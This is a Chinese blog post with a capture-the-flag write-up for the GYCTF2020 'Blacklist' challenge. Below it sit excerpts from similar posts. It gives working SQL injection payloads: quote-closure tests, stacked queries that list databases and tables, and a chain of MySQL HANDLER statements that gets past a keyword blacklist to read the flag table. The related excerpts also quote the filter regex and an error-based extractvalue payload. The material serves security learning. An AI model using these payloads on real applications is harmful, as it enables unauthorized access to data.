[GYCTF2020]Blacklist 1

最新推荐文章于 2024-02-05 15:01:15 发布
最新推荐文章于 2024-02-05 15:01:15 发布
阅读量386 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129505769
版权
文章详细描述了一种SQL注入攻击的解决过程,通过分析黑名单绕过策略,利用1unionselect...#payload发现闭合方式。接着,通过1or1=1#确认闭合方式,并利用未被过滤的handler函数,构建payload读取数据库信息,包括database名、tables及特定用户数据。
摘要由CSDN通过智能技术生成

文章目录

[GYCTF2020]Blacklist 1

1.感觉像是一种注入,blacklist黑名单绕过在这里插入图片描述更具一系列操作可以判断出闭合方式为 1’
通过这句paylaod:1’ union select 1,2# 找到黑名单
在这里插入图片描述2.继续构造payload,1’ or 1=1#,确定了闭合方式
使用接下来的语句 1’;show database;#

在这里插入图片描述3.1’;show tables;#
在这里插入图片描述4.这里有两个表,由于我们被过滤了许多函数,但是handler函数没有被过滤,于是我们运用handler函数来构造payload:
1’;handler FlagHere open;handler FlagHere read first;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;handler FlagHere read next;在这里插入图片描述 handler函数运用

handler user open;
handler user read;读出什么输出什么

handler user read first [where username=‘admin’];
handler user read next [where username=‘admin’]; – [] 中的内容意味着可加可不加
Harder.
关注
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 704
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 306
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1168
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 818
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
Web_SQL注入(1)
Lemon's blog
07-15 617
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
buuctf刷题
小飒的博客
07-11 286
重温一下buuctf前面的题目 hint: flag in ffffllllaaaagggg mb_substr() 函数返回字符串的一部分mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置checkFile函数的作用: 判断page是否被设置,是否为字符串 判断page是否在whitelist中 以?为分割符取出之前的字符,保存在page判断_page 判断p​age判断_page是否在whitelist中 url解码后以?为分割符取出之前字符,判断是否在whitelist中?fil
BUU实战笔记——[GYCTF2020]Blacklist 1
qq_51175992的博客
10-26 133
这题主要考察的是绕过黑名单,当select被过滤之后我们应该考虑其他方法进行查看,这里是利用了堆叠注入,我们需要注意堆叠注入的条件以及当没有select时可以采用Handler命令进行查询。
[GYCTF2020]Blacklist 1详解(handler命令用法!)
m0_73734159的博客
12-01 988
果不其然改表名的两个关键命令被过滤了。select这个查询命令大家都很熟悉。但是我们却忽略了一个也很重要的角色。虽然handler这个命令不常见。那就是handler查询命令。存在FlagHere数据表。极有可能当中存在flag。rename和alter。包括查询命令也被过滤了。可知本题是字符型注入。
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2560
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1650
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
ROSE笔记-[GYCTF2020]Blacklist 1-WP
居上
11-13 370
[GYCTF2020]Blacklist 1 输入单引号,报错,sql注入. 1' or 1=1 order by 2#没有报错 1' or 1=1 order by 3#报错 先尝试联合查询 1' or 1=1 union select 1,2 发现过滤了大部分关键字 1' or 1=1;show databases;#查库 1' or 1=1;show tables;#查表 1' or 1=1;desc FlagHere;#查字段 HANDLER … OPEN语句打开一个表,使其可以使用后
[GYCTF2020]Blacklist1-BUUCTF-详解
最新发布
chinese_cabbage0的博客
02-05 1819
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 374
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
[GYCTF2020]Blacklist
weixin_43152809的博客
11-02 441
输入1或者2会返回一个数组 随后输入1’ union select 1,database()–+返回了过滤掉的语句 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 尝试报错注入: 输入 or extractvalue(1,concat(user(),0x7e,version())) 随后输入 1' and extractvalue(1,concat(
Android平台通信Blacklist服务设计及实战开发
本篇论文深入探讨了在Android平台下通信Blacklist服务的设计与实现。作者徐鹏,信息工程学院通信工程专业,学号20084882,在导师马强讲师和乌日娜讲师的指导下完成。随着移动设备技术的快速发展,智能手机已超越传统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值